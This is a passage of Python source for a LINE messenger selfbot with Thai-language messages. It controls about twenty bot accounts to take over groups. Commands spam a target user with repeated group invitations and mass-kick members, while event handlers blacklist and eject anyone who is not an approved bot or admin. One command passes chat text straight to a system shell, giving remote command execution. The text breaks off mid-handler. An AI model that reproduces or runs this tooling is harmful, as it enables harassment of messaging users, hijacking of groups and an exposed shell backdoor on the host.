count = int(bb[0])
name = str(bb[1])
target = bb[2]
grup = kicker7.groups
try:
kicker7.findAndAddContactsByMid(target)
except:
pass
for anu in range(count):
kicker8.createGroup(name, [target])
for i in grup:
group = kicker8.getGroup(i)
if group.name == name:
kicker8.inviteIntoGroup(group.id, [target])
print("Inviting to group %s"%anu)
print("Sukses mank")
line.sendMessage(msg.to, "Success invite %s\nGroup : %s\nCount : %s"%(kicker7.getContact(target).displayName, name, count))
elif cmd.startswith("spaminv8 "):
aa = cmd.replace("spaminv8 ","")
bb = aa.split("-")
count = int(bb[0])
name = str(bb[1])
target = bb[2]
grup = kicker9.groups
try:
kicker9.findAndAddContactsByMid(target)
except:
pass
for anu in range(count):
kicker9.createGroup(name, [target])
for i in grup:
group = kicker9.getGroup(i)
if group.name == name:
kicker9.inviteIntoGroup(group.id, [target])
print("Inviting to group %s"%anu)
print("Sukses mank")
line.sendMessage(msg.to, "Success invite %s\nGroup : %s\nCount : %s"%(kicker9.getContact(target).displayName, name, count))
elif cmd.startswith("spaminv9 "):
aa = cmd.replace("spaminv9 ","")
bb = aa.split("-")
count = int(bb[0])
name = str(bb[1])
target = bb[2]
grup = kicker10.groups
try:
kicker10.findAndAddContactsByMid(target)
except:
pass
for anu in range(count):
kicker10.createGroup(name, [target])
for i in grup:
group = kicker10.getGroup(i)
if group.name == name:
kicker10.inviteIntoGroup(group.id, [target])
print("Inviting to group %s"%anu)
print("Sukses mank")
line.sendMessage(msg.to, "Success invite %s\nGroup : %s\nCount : %s"%(kicker10.getContact(target).displayName, name, count))
elif cmd.startswith("spaminv10 "):
aa = cmd.replace("spaminv10 ","")
bb = aa.split("-")
count = int(bb[0])
name = str(bb[1])
target = bb[2]
grup = g1.groups
try:
g1.findAndAddContactsByMid(target)
except:
pass
for anu in range(count):
g1.createGroup(name, [target])
for i in grup:
group = g1.getGroup(i)
if group.name == name:
g1.inviteIntoGroup(group.id, [target])
print("Inviting to group %s"%anu)
print("Sukses mank")
line.sendMessage(msg.to, "Success invite %s\nGroup : %s\nCount : %s"%(g1.getContact(target).displayName, name, count))
elif cmd.startswith("spaminv11 "):
aa = cmd.replace("spaminv11 ","")
bb = aa.split("-")
count = int(bb[0])
name = str(bb[1])
target = bb[2]
grup = kicker7.groups
try:
kicker7.findAndAddContactsByMid(target)
except:
pass
for anu in range(count):
kicker7.createGroup(name, [target])
for i in grup:
group = kicker7.getGroup(i)
if group.name == name:
kicker7.inviteIntoGroup(group.id, [target])
print("Inviting to group %s"%anu)
print("Sukses mank")
line.sendMessage(msg.to, "Success invite %s\nGroup : %s\nCount : %s"%(kicker7.getContact(target).displayName, name, count))
elif ".s " in msg.text.lower():
spl = re.split(".s ",msg.text,flags=re.IGNORECASE)
if spl[0] == "":
try:
line.sendMessage(to,subprocess.getoutput(spl[1]))
except:
pass
elif cmd == 'ปิดลิ้ง':
if msg.toType != 2: return line.sendMessage(to, 'ไม่สามารถเปิดลิ้งกลุ่มได้\nคำสั่งนี้ใช้ได้ในกลุ่มเท่านั้น')
group = line.getGroup(to)
group.preventedJoinByTicket = True
line.updateGroup(group)
line.sendMessage(to, 'ได้ทำการปิดลิ้งกลุ่มแล้วเจ้านาย')
elif cmd.startswith('changegroupname '):
if msg.toType != 2: return line.sendMessage(to, 'ไม่สามารถเปลี่ยนชื่อกลุ่มได้\nคำสั่งนี้ใช้ได้ในกลุ่มเท่านั้น')
group = line.getGroup(to)
gname = removeCmd(text, setKey)
if len(gname) > 50:
return line.sendMessage(to, 'ไม่สามารถเปลี่ยนชื่อกลุ่มได้\nชื่อกลุ่มต้องไม่เกิน 50')
group.name = gname
line.updateGroup(group)
line.sendMessage(to, 'เปลี่ยนชื่อกลุ่มเป็น `%s`' % gname)
elif cmd == 'changegrouppict':
if msg.toType != 2: return line.sendMessage(to, 'ไม่สามารถเปลี่ยนรุปกลุ่มได้\nคำสั่งนี้ใช้ได้ในกลุ่มเท่านั้น')
if to not in settings['changeGroupPicture']:
settings['changeGroupPicture'].append(to)
line.sendMessage(to, 'กรุณาส่งภาพ, พิม `{key}Abort` ถ้าต้องการยกเลิก\nคำเตือน:การดาวน์โหลดภาพจะล้มเหลวหากอัพโหลดภาพนานเกินไป'.format(key=setKey.title()))
else:
line.sendMessage(to, 'คำสั่งนี้ถูกงานอยู่แล้ว, กรุณาส่งภาพ หรือ พิม `{key}Abort` ถ้าต้องการยกเลิก\nคำเตือน:การดาวน์โหลดภาพจะล้มเหลวหากอัพโหลดภาพนานเกินไป'.format(key=setKey.title()))
elif cmd == 'ทดสอบ':
if msg.toType != 2: return line.sendMessage(to, 'ไม่สามารถเตะสมาชิกทั้งหมดได้\nคำสั่งนี้ใช้ได้ในกลุ่มเท่านั้น')
group = line.getGroup(to)
if not group.members:
return line.sendMessage(to, 'ไม่สามารถเตะสมาชิกทั้งหมดได้\nไม่มีคนไห้เตะ')
for member in group.members:
if member.mid == myMid:
continue
try:
line.kickoutFromGroup(to, [member.mid])
except TalkException as talk_error:
return line.sendMessage(to, 'ไม่สามารถเตะสมาชิกทั้งหมดได้เนื่องจาก `%s`' % talk_error.reason)
time.sleep(0.8)
line.sendMessage(to, 'เตะสมาชิกทั้งหมด, จำนวน %i คน' % len(group.members))
elif cmd == 'ยกเชิญ':
if msg.toType != 2: return line.sendMessage(to, 'ไม่สามารถยกเลิกค้างเชิญได้\nคำสั่งนี้ใช้ได้ในกลุ่มเท่านั้น')
group = line.getGroup(to)
if not group.invitee:
return line.sendMessage(to, 'ไม่สามารถยกเลิกค้างเชิญได้\nไม่มีสมาชิกค้างเชิญ')
for member in group.invitee:
if member.mid == myMid:
continue
try:
line.cancelGroupInvitation(to, [member.mid])
except TalkException as talk_error:
return line.sendMessage(to, 'ไม่สามารถยกเลิกค้างเชิญได้เนื่องจาก `%s`' % talk_error.reason)
time.sleep(0.8)
line.sendMessage(to, 'ยกเลิกค้างเชิญทั้งหมดแล้ว\nจำนวน %i คน' % len(group.invitee))
elif cmd.startswith('นับ'):
textt = removeCmd(text, setKey)
texttl = textt.lower()
if msg.toType in [1, 2] and to not in lurking:
lurking[to] = {
'status': False,
'time': None,
'members': [],
'reply': {
'status': False,
'message': settings['defaultReplyReader']
}
}
res = '╭───🍁 ตั้งจับ คนแอดอ่าน 🍁'
if msg.toType in [1, 2]: res += '\n├🙄 Status : ' + bool_dict[lurking[to]['status']][1]
if msg.toType in [1, 2]: res += '\n├🙄 Reply Reader : ' + bool_dict[lurking[to]['reply']['status']][1]
if msg.toType in [1, 2]: res += '\n├🙄 ข้อความ ทักทาย : ' + lurking[to]['reply']['message']
res += '\n├👊 Usage : '
res += '\n│🙄 {key}นับ'
res += '\n│🙄 {key}นับ ❪เปิด⁐ปิด❫ '
res += '\n│🙄 {key}นับ รีบู'
res += '\n│🙄 {key}นับ เริ่มใหม่'
res += '\n│🙄 {key}นับ ReplyReader <on/off>'
res += '\n│🙄 {key}นับ ReplyReader <message>'
res += '\n╰───👊【☠⁐Tҽαɱ ƑմçҟᎠҽѵìӀ✍⁐☠】👊'
if cmd == 'นับ':
line.sendMessage(to, parsingRes(res).format_map(SafeDict(key=setKey.title())))
elif msg.toType not in [1, 2]:
return line.sendMessage(to, 'ไม่สามารถใช้คำสั่งนี้ได้\nคำสั่งนี้ใช้ได้ในกลุ่มเท่านั้น')
elif texttl == 'เปิด':
if lurking[to]['status']:
line.sendMessage(to, 'เปิดโหมดตรวจจับคนอ่าน')
else:
lurking[to].update({
'status': True,
'time': datetime.now(tz=pytz.timezone('Asia/Jakarta')).strftime('%Y-%m-%d %H:%M:%S'),
'members': []
})
line.sendMessage(to, '😜ได้ทำการปิดจับคนแอดอ่านแล้ว😜')
elif texttl == 'ปิด':
if not lurking[to]['status']:
line.sendMessage(to, 'ปิดโหมดตรวจจับคนอ่าน')
else:
lurking[to].update({
'status': False,
'time': None,
'members': []
})
line.sendMessage(to, '😜ได้ทำการปิดดูคนแอดอ่านแล้ว😜')
elif texttl == 'เริ่มใหม่':
if not lurking[to]['status']:
line.sendMessage(to, 'รีเช็ตคนอ่านเรียบร้อย')
else:
if not lurking[to]['members']:
line.sendMessage(to, 'ไม่สามารถรีเช็ตคนอ่านได้\nเนื่องจากไม่พบคนอ่าน')
else:
members = lurking[to]['members']
res = '╭───🍁 ตั้งจับ คนแอดอ่าน 🍁'
if msg.toType == 2: res += '\n├😊 Group Name : ' + line.getGroup(to).name
parsed_len = len(members)//200+1
no = 0
for point in range(parsed_len):
for member in members[point*200:(point+1)*200]:
no += 1
try:
name = line.getContact(member).displayName
except TalkException:
name = 'Unknown'
res += '\n│ %i. %s' % (no, name)
if member == members[-1]:
res += '\n│'
res += '\n├ Time Set : ' + lurking[to]['time']
res += '\n╰───👊【☠⁐Tҽαɱ ƑմçҟᎠҽѵìӀ✍⁐☠】👊'
if res:
if res.startswith('\n'): res = res[1:]
line.sendMessage(to, res)
res = ''
elif texttl == 'รีบู':
if not lurking[to]['status']:
line.sendMessage(to, 'ไม่สามารถรีเช็ตคนอ่านได้\nยังไม่ได้เปิดโหมดตรวจจับคนอ่าน')
else:
lurking[to].update({
'status': True,
'time': datetime.now(tz=pytz.timezone('Asia/Jakarta')).strftime('%Y-%m-%d %H:%M:%S'),
'members': []
})
line.sendMessage(to, 'รีเช็ตเรียบร้อย')
elif texttl.startswith('replyreader '):
texts = textt[12:]
if texts == 'on':
if lurking[to]['reply']['status']:
line.sendMessage(to, 'ข้อความทักคนอ่านเปิดใช้งานอยู่แล้ว')
else:
lurking[to]['reply']['status'] = True
line.sendMessage(to, 'เปิดข้อความทักคนอ่าน')
elif texts == 'off':
if not lurking[to]['reply']['status']:
line.sendMessage(to, 'ข้อความทักคนอ่านถุกปิดใช้งานอยู่แล้ว')
else:
lurking[to]['reply']['status'] = False
line.sendMessage(to, 'ปิดข้อความทักคนอ่าน')
else:
lurking[to]['reply']['message'] = texts
line.sendMessage(to, 'เปลี่ยนข้อความทักคนอ่านเป็น `%s`' % texts)
else:
line.sendMessage(to, parsingRes(res).format_map(SafeDict(key=setKey.title())))
elif cmd.startswith('ทักทาย'):
textt = removeCmd(text, setKey)
texttl = textt.lower()
res = '╭───🍁 ข้อความ ทักทายเข้ากลุ่ม 🍁'
res += '\n├👊ทักทาย เข้า : ' + bool_dict[settings['greet']['join']['status']][1]
res += '\n├👊ข้อความ : ' + settings['greet']['join']['message']
res += '\n├👊ทักทาย ออก : ' + bool_dict[settings['greet']['leave']['status']][0]
res += '\n├👊ข้อความ : ' + settings['greet']['leave']['message']
res += '\n├🌷Usage : '
res += '\n│🙄{key}ทักทาย'
res += '\n│🙄{key}ทักทาย เข้า ❨เปิด⁐ปิด❩'
res += '\n│🙄{key}ทักทาย เข้า ❨พิมพ์❩'
res += '\n│🙄{key}ทักทาย ออก ❨เปิด⁐ปิด❩'
res += '\n│🙄{key}ทักทาย ออก ❨พิมพ์❩'
res += '\n╰───👊【☠⁐Tҽαɱ ƑմçҟᎠҽѵìӀ✍⁐☠】👊'
if cmd == 'ทักทาย':
line.sendMessage(to, parsingRes(res).format_map(SafeDict(key=setKey.title())))
elif texttl.startswith('เข้า '):
texts = textt[5:]
textsl = texts.lower()
if textsl == 'เปิด':
if settings['greet']['join']['status']:
line.sendMessage(to, 'ข้อความทักคนเข้ากลุ่มถูกเปิดใช้งานอยู่แล้ว')
else:
settings['greet']['join']['status'] = True
line.sendMessage(to, 'เปิดข้อความทักคนเข้ากลุ่ม')
elif textsl == 'ปิด':
if not settings['greet']['join']['status']:
line.sendMessage(to, 'ข้อความทักคนเข้ากลุ่มถูกปิดใช้งานอยู่แล้ว')
else:
settings['greet']['join']['status'] = False
line.sendMessage(to, 'ปิดข้อความทักคนเข้ากลุ่ม')
else:
settings['greet']['join']['message'] = texts
line.sendMessage(to, 'เปลี่ยนข้อความทักคนเข้ากลุ่มเป็น `%s`' % texts)
elif texttl.startswith('ออก '):
texts = textt[6:]
textsl = texts.lower()
if textsl == 'เปิด':
if settings['greet']['leave']['status']:
line.sendMessage(to, 'ข้อความทักคนออกกลุ่มถุกเปิดใช้งานอยู่แล้ว')
else:
settings['greet']['leave']['status'] = True
line.sendMessage(to, 'เปิดข้อความทักคนออกกลุ่ม')
elif textsl == 'ปิด':
if not settings['greet']['leave']['status']:
line.sendMessage(to, 'ข้อความทักคนออกกลุ่มถูกปิดใช้งานอยู่แล้ว')
else:
settings['greet']['leave']['status'] = False
line.sendMessage(to, 'ปิดข้อความทักคนออกกลุ่ม')
else:
settings['greet']['leave']['message'] = texts
line.sendMessage(to, 'เปลี่ยนข้อความทักคนออกกลุ่มเป็น `%s`' % texts)
else:
line.sendMessage(to, parsingRes(res).format_map(SafeDict(key=setKey.title())))
elif cmd.startswith('เตะ '):
if msg.toType != 2: return line.sendMessage(to, 'คำสั่งนี้ใช้ได้เฉพาะในกลุ่มเท่านั้น')
if 'MENTION' in msg.contentMetadata.keys():
mentions = ast.literal_eval(msg.contentMetadata['MENTION'])
for mention in mentions['MENTIONEES']:
mid = mention['M']
if mid == myMid:
continue
try:
kicker5.kickoutFromGroup(to, [mid])
except TalkException as talk_error:
return kicker5.sendMessage(to, 'ไม่สามารถเตะสมาชิกได้\nเนื่องจาก `%s`' % talk_error.reason)
time.sleep(0.8)
kicker5.sendMessage(to, 'เตะสมาชิกเรียบร้อย\nจำนวน %i คน' % len(mentions['MENTIONEES']))
else:
kicker5.sendMessage(to, 'ไม่สามารถเตะสมาชิกได้\nกรุณาแท็กคนที่จะเตะ')
elif cmd.startswith('ปลิว '):
if msg.toType != 2: return line.sendMessage(to, 'คำสั่งนี้ใช้ได้เฉพาะในกลุ่มเท่านั้น')
if 'MENTION' in msg.contentMetadata.keys():
mentions = ast.literal_eval(msg.contentMetadata['MENTION'])
for mention in mentions['MENTIONEES']:
mid = mention['M']
if mid == myMid:
continue
try:
line.kickoutFromGroup(to, [mid])
line.findAndAddContactsByMid(mid)
line.inviteIntoGroup(to, [mid])
line.cancelGroupInvitation(to, [mid])
except TalkException as talk_error:
return line.sendMessage(to, 'ไม่สามารถเตะสมาชิกได้\nเนื่องจาก `%s`' % talk_error.reason)
time.sleep(0.8)
line.sendMessage(to, 'เตะสมาชิกเรียบร้อย\nจำนวน %i คน' % len(mentions['MENTIONEES']))
else:
line.sendMessage(to, 'ไม่สามารถเตะสมาชิกได้\nกรุณาแท็กคนที่จะเตะ')
ronum = 0
def executeOp(op):
global ronum
try:
if op.type == 0:
return
if op.type == 13:
group = line.getGroup(op.param1)
group.members = [] if not group.members else group.members
if len(group.members) <= 10:
line.acceptGroupInvitation(group.id)
time.sleep(0.02)
line.leaveGroup(group.id)
ronum = (ronum + 1)
print(ronum)
print ('[* %i ] %s' % (op.type, OpType._VALUES_TO_NAMES[op.type].replace('_', ' ')))
if op.type == 5:
if settings['autoAdd']['status']:
line.findAndAddContactsByMid(op.param1)
if settings['autoAdd']['reply']:
if '@!' not in settings['autoAdd']['message']:
line.sendMessage(op.param1, settings['autoAdd']['message'])
else:
line.sendMentionV2(op.param1, settings['autoAdd']['message'], [op.param1])
if op.type == 15:
if settings['greet']['leave']['status']:
if '@!' not in settings['greet']['leave']['message']:
line.sendMessage(op.param1, settings['greet']['leave']['message'].format(name=line.getGroup(op.param1).name))
else:
line.sendMentionV2(op.param1, settings['greet']['leave']['message'].format(name=line.getGroup(op.param1).name), [op.param2])
if op.type == 17:
if settings['greet']['join']['status']:
if '@!' not in settings['greet']['join']['message']:
line.sendMessage(op.param1, settings['greet']['join']['message'].format(name=line.getGroup(op.param1).name))
else:
line.sendMentionV2(op.param1, settings['greet']['join']['message'].format(name=line.getGroup(op.param1).name), [op.param2])
if op.type == 11:
if op.param1 in protectqr:
try:
if line.getGroup(op.param1).preventedJoinByTicket == False:
if op.param2 not in Bots and op.param2 not in owner and op.param2 not in admin and op.param2 not in staff:
random.choice(ABC).reissueGroupTicket(op.param1)
X = line.getGroup(op.param1)
X.preventedJoinByTicket = True
random.choice(ABC).updateGroup(X)
random.choice(ABC).kickoutFromGroup(op.param1,[op.param2])
except:
pass
if op.type == 13:
if op.param1 in protectinvite:
if op.param2 not in Bots and op.param2 not in owner and op.param2 not in admin and op.param2 not in staff:
try:
invitor = op.param2
gotinvite = []
if "\x1e" in op.param3:
gotinvite = op.param3.split("\x1e")
else:
gotinvite.append(op.param3)
for u in gotinvite:
wait["blacklist"][op.param2] = True
kicker.cancelGroupInvitation(op.param1,[op.param3])
kicker.kickoutFromGroup(op.param1,[op.param2])
except:
try:
kicker2.cancelGroupInvitation(op.param1,[op.param3])
kicker2.kickoutFromGroup(op.param1,[op.param2])
except:
try:
kicker3.cancelGroupInvitation(op.param1,[op.param3])
kicker3.kickoutFromGroup(op.param1,[op.param2])
except:
try:
kicker4.cancelGroupInvitation(op.param1,[op.param3])
kicker4.kickoutFromGroup(op.param1,[op.param2])
except:
try:
kicker5.cancelGroupInvitation(op.param1,[op.param3])
kicker5.kickoutFromGroup(op.param1,[op.param2])
except:
try:
kicker6.cancelGroupInvitation(op.param1,[op.param3])
kicker6.kickoutFromGroup(op.param1,[op.param2])
except:
try:
kicker7.cancelGroupInvitation(op.param1,[op.param3])
kicker7.kickoutFromGroup(op.param1,[op.param2])
except:
try:
kicker8.cancelGroupInvitation(op.param1,[op.param3])
kicker8.kickoutFromGroup(op.param1,[op.param2])
except:
try:
kicker9.cancelGroupInvitation(op.param1,[op.param3])
kicker9.kickoutFromGroup(op.param1,[op.param2])
except:
try:
kicker10.cancelGroupInvitation(op.param1,[op.param3])
kicker10.kickoutFromGroup(op.param1,[op.param2])
except:
pass
if op.type == 13:
if op.param3 in wait["blacklist"]:
if op.param2 not in Bots and op.param2 not in owner and op.param2 not in admin and op.param2 not in staff:
random.choice(ABC).cancelGroupInvitation(op.param1,[op.param3])
random.choice(ABC).kickoutFromGroup(op.param1,[op.param2])
G = line.getGroup(op.param1)
G.preventedJoinByTicket = True
random.choice(ABC).updateGroup(G)
if op.type == 32:
if op.param1 in protectcanceljs:
if op.param3 in Bots:
if op.param2 not in Bots and op.param2 not in owner and op.param2 not in admin and op.param2 not in staff:
wait["blacklist"][op.param2] = True
try:
if op.param3 not in wait["blacklist"]:
random.choice(ABC).kickoutFromGroup(op.param1,[op.param2])
line.inviteIntoGroup(op.param1,[g1MID])
G.preventedJoinByTicket = True
random.choice(ABC).updateGroup(G)
except:
pass
return
if op.type == 32:
if op.param2 not in Bots and op.param2 not in owner and op.param2 not in admin and op.param2 not in staff:
pass
if op.param1 in protectcancel:
random.choice(ABC).kickoutFromGroup(op.param1,[op.param2])
kicker.findAndAddContactsByMid(op.param3)
kicker.inviteIntoGroup(op.param1,[op.param3])
wait["blacklist"][op.param2] = True
if op.type == 17:
if op.param2 in wait["blacklist"]:
if op.param2 not in Bots and op.param2 not in owner and op.param2 not in admin and op.param2 not in staff:
random.choice(ABC).kickoutFromGroup(op.param1,[op.param2])
G = line.getGroup(op.param1)
G.preventedJoinByTicket = True
random.choice(ABC).updateGroup(G)
if op.type == 17:
if op.param1 in protecARoin:
if op.param2 not in Bots and op.param2 not in owner and op.param2 not in admin and op.param2 not in staff:
wait["blacklist"][op.param2] = True
try:
if op.param3 not in wait["blacklist"]:
random.choice(ABC).kickoutFromGroup(op.param1,[op.param2])
except:
pass
return
#================================================================================
if op.type == 19:
if op.param1 in protectkick:
if op.param2 not in Bots and op.param2 not in owner and op.param2 not in admin and op.param2 not in staff:
wait["blacklist"][op.param2] = True
random.choice(ABC).kickoutFromGroup(op.param1,[op.param2])
else:
pass
if op.type == 19:
if op.param1 in ghost:
if op.param2 not in Bots and op.param2 not in owner and op.param2 not in admin and op.param2 not in staff:
G = line.getGroup(op.param1)
G.preventedJoinByTicket = False
random.choice(ABC).updateGroup(G)
invsend = 0
Ticket = random.choice(ABC).reissueGroupTicket(op.param1)
g1.acceptGroupInvitationByTicket(op.param1,Ticket)
g1.kickoutFromGroup(op.param1,[op.param2])
X = line.getGroup(op.param1)
X.preventedJoinByTicket = True
random.choice(ABC).updateGroup(X)
if op.type == 19:
if op.param1 in protectantijs:
if myMid in op.param3:
if op.param2 not in Bots and op.param2 not in owner and op.param2 not in admin and op.param2 not in staff:
try:
g1.acceptGroupInvitation(op.param1)
g1.inviteIntoGroup(op.param1,[myMid])
g1.kickoutFromGroup(op.param1,[op.param2])
line.acceptGroupInvitation(op.param1)
wait["blacklist"][op.param2] = True
g1.leaveGroup(op.param1)
line.inviteIntoGroup(op.param1,[Amid,Bmid,Cmid,Dmid,Emid,Fmid,Gmid,Hmid,Imid,Jmid,ga1,ga2,ga3,ga4,ga5,ga6,ga7,ga8,ga9,ga10,g1MID])
except:
pass
if op.type == 19:
if myMid in op.param3:
if op.param2 in Bots:
pass
if op.param2 in owner:
pass
if op.param2 in admin:
pass
if op.param2 in staff:
pass
else:
wait["blacklist"][op.param2] = True
try:
kicker.kickoutFromGroup(op.param1,[op.param2])
kicker.inviteIntoGroup(op.param1,[op.param3])
line.acceptGroupInvitation(op.param1)
except:
try:
kicker2.kickoutFromGroup(op.param1,[op.param2])
kicker2.inviteIntoGroup(op.param1,[op.param3])
line.acceptGroupInvitation(op.param1)
except:
try:
kicker3.kickoutFromGroup(op.param1,[op.param2])
kicker3.inviteIntoGroup(op.param1,[op.param3])
line.acceptGroupInvitation(op.param1)
except:
try:
G = kicker4.getGroup(op.param1)
G.preventedJoinByTicket = False
kicker4.kickoutFromGroup(op.param1,[op.param2])
kicker4.updateGroup(G)
Ticket = kicker4.reissueGroupTicket(op.param1)
line.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker2.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker3.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker4.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker5.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker6.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker7.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker8.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker9.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker10.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker11.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker12.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker13.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker14.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker15.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker16.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker17.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker18.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker19.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker20.acceptGroupInvitationByTicket(op.param1,Ticket)
G = kicker4.getGroup(op.param1)
G.preventedJoinByTicket = True
kicker4.updateGroup(G)
Ticket = kicker4.reissueGroupTicket(op.param1)
except:
try:
kicker5.kickoutFromGroup(op.param1,[op.param2])
kicker5.inviteIntoGroup(op.param1,[op.param3])
line.acceptGroupInvitation(op.param1)
except:
try:
kicker6.kickoutFromGroup(op.param1,[op.param2])
kicker6.inviteIntoGroup(op.param1,[op.param3])
line.acceptGroupInvitation(op.param1)
except:
try:
kicker7.kickoutFromGroup(op.param1,[op.param2])
kicker7.inviteIntoGroup(op.param1,[op.param3])
line.acceptGroupInvitation(op.param1)
except:
try:
kicker8.kickoutFromGroup(op.param1,[op.param2])
kicker8.inviteIntoGroup(op.param1,[op.param3])
line.acceptGroupInvitation(op.param1)
except:
try:
kicker9.kickoutFromGroup(op.param1,[op.param2])
kicker9.inviteIntoGroup(op.param1,[op.param3])
line.acceptGroupInvitation(op.param1)
except:
try:
kicker10.kickoutFromGroup(op.param1,[op.param2])
kicker10.inviteIntoGroup(op.param1,[op.param3])
line.acceptGroupInvitation(op.param1)
except:
try:
kicker11.kickoutFromGroup(op.param1,[op.param2])
kicker11.inviteIntoGroup(op.param1,[op.param3])
line.acceptGroupInvitation(op.param1)
except:
try:
kicker12.kickoutFromGroup(op.param1,[op.param2])
kicker12.inviteIntoGroup(op.param1,[op.param3])
line.acceptGroupInvitation(op.param1)
except:
try:
kicker13.kickoutFromGroup(op.param1,[op.param2])
kicker13.inviteIntoGroup(op.param1,[op.param3])
line.acceptGroupInvitation(op.param1)
except:
try:
kicker14.kickoutFromGroup(op.param1,[op.param2])
kicker14.inviteIntoGroup(op.param1,[op.param3])
line.acceptGroupInvitation(op.param1)
except:
try:
kicker15.kickoutFromGroup(op.param1,[op.param2])
kicker15.inviteIntoGroup(op.param1,[op.param3])
line.acceptGroupInvitation(op.param1)
except:
try:
kicker16.kickoutFromGroup(op.param1,[op.param2])
kicker16.inviteIntoGroup(op.param1,[op.param3])
line.acceptGroupInvitation(op.param1)
except:
try:
kicker17.kickoutFromGroup(op.param1,[op.param2])
kicker17.inviteIntoGroup(op.param1,[op.param3])
line.acceptGroupInvitation(op.param1)
except:
try:
kicker18.kickoutFromGroup(op.param1,[op.param2])
kicker18.inviteIntoGroup(op.param1,[op.param3])
line.acceptGroupInvitation(op.param1)
except:
try:
kicker19.kickoutFromGroup(op.param1,[op.param2])
kicker20.kickoutFromGroup(op.param1,[op.param2])
kicker20.inviteIntoGroup(op.param1,[op.param3])
line.acceptGroupInvitation(op.param1)
except:
pass
return
if Amid in op.param3:
if op.param2 in Bots:
pass
if op.param2 in owner:
pass
if op.param2 in admin:
pass
if op.param2 in staff:
pass
else:
wait["blacklist"][op.param2] = True
try:
kicker2.kickoutFromGroup(op.param1,[op.param2])
kicker2.inviteIntoGroup(op.param1,[op.param3])
kicker.acceptGroupInvitation(op.param1)
except:
try:
kicker3.kickoutFromGroup(op.param1,[op.param2])
kicker3.inviteIntoGroup(op.param1,[op.param3])
kicker.acceptGroupInvitation(op.param1)
except:
try:
kicker4.kickoutFromGroup(op.param1,[op.param2])
kicker4.inviteIntoGroup(op.param1,[op.param3])
kicker.acceptGroupInvitation(op.param1)
except:
try:
G = kicker5.getGroup(op.param1)
G.preventedJoinByTicket = False
kicker5.kickoutFromGroup(op.param1,[op.param2])
kicker5.updateGroup(G)
Ticket = kicker5.reissueGroupTicket(op.param1)
line.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker2.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker3.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker4.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker5.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker6.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker7.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker8.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker9.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker10.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker11.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker12.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker13.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker14.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker15.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker16.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker17.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker18.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker19.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker20.acceptGroupInvitationByTicket(op.param1,Ticket)
G = kicker5.getGroup(op.param1)
G.preventedJoinByTicket = True
kicker5.updateGroup(G)
Ticket = kicker5.reissueGroupTicket(op.param1)
except:
try:
kicker6.kickoutFromGroup(op.param1,[op.param2])
kicker6.inviteIntoGroup(op.param1,[op.param3])
kicker.acceptGroupInvitation(op.param1)
except:
try:
kicker7.kickoutFromGroup(op.param1,[op.param2])
kicker7.inviteIntoGroup(op.param1,[op.param3])
kicker.acceptGroupInvitation(op.param1)
except:
try:
kicker8.kickoutFromGroup(op.param1,[op.param2])
kicker8.inviteIntoGroup(op.param1,[op.param3])
kicker.acceptGroupInvitation(op.param1)
except:
try:
kicker9.kickoutFromGroup(op.param1,[op.param2])
kicker9.inviteIntoGroup(op.param1,[op.param3])
kicker.acceptGroupInvitation(op.param1)
except:
try:
kicker10.kickoutFromGroup(op.param1,[op.param2])
kicker10.inviteIntoGroup(op.param1,[op.param3])
kicker.acceptGroupInvitation(op.param1)
except:
try:
kicker11.kickoutFromGroup(op.param1,[op.param2])
kicker11.inviteIntoGroup(op.param1,[op.param3])
kicker.acceptGroupInvitation(op.param1)
except:
try:
kicker12.kickoutFromGroup(op.param1,[op.param2])
kicker12.inviteIntoGroup(op.param1,[op.param3])
kicker.acceptGroupInvitation(op.param1)
except:
try:
kicker13.kickoutFromGroup(op.param1,[op.param2])
kicker13.inviteIntoGroup(op.param1,[op.param3])
kicker.acceptGroupInvitation(op.param1)
except:
try:
kicker14.kickoutFromGroup(op.param1,[op.param2])
kicker14.inviteIntoGroup(op.param1,[op.param3])
kicker.acceptGroupInvitation(op.param1)
except:
try:
kicker15.kickoutFromGroup(op.param1,[op.param2])
kicker15.inviteIntoGroup(op.param1,[op.param3])
kicker.acceptGroupInvitation(op.param1)
except:
try:
kicker16.kickoutFromGroup(op.param1,[op.param2])
kicker16.inviteIntoGroup(op.param1,[op.param3])
kicker.acceptGroupInvitation(op.param1)
except:
try:
kicker17.kickoutFromGroup(op.param1,[op.param2])
kicker17.inviteIntoGroup(op.param1,[op.param3])
kicker.acceptGroupInvitation(op.param1)
except:
try:
kicker18.kickoutFromGroup(op.param1,[op.param2])
kicker18.inviteIntoGroup(op.param1,[op.param3])
